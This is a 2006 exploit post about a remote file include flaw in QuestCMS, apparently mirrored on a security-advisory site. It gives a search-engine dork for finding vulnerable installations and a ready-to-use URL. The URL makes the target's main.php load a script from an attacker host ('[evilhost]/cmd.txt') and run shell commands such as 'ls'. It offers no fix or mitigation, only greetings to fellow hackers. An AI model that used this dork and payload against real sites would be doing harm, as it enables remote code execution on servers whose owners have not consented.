Computer Security

Security Advisory: Questcms Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  XSS Vulnerability in FTD v3.7.3

  [Full-disclosure] PHPCodeCabinet Vulnerability

  Tinyportal Shoutbox

  vBulletin 3.0.14 ~ init.php~ registerring global arbitary variable~ XSS exploit

From:crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:07.08.2006
Subject:Questcms Remote File Include Vulnerability

!!!!!!!!!WWW.SİBERSAVASCİLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : Questcms Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------


dork        : allinurl:"/questcms/"
Exploit     :

--------------------------------------------------------------------------------


Usage:

http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.
txt?&cmd=ls

--------------------------------------------------------------------------------


greets:

X_ALPREN_X,Root_Mor and My Other Friends

--------------------------------------------------------------------------------




--------------------------------- [ WWW.SİBERSAVASCİLAR.COM ] --------------------------------------


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server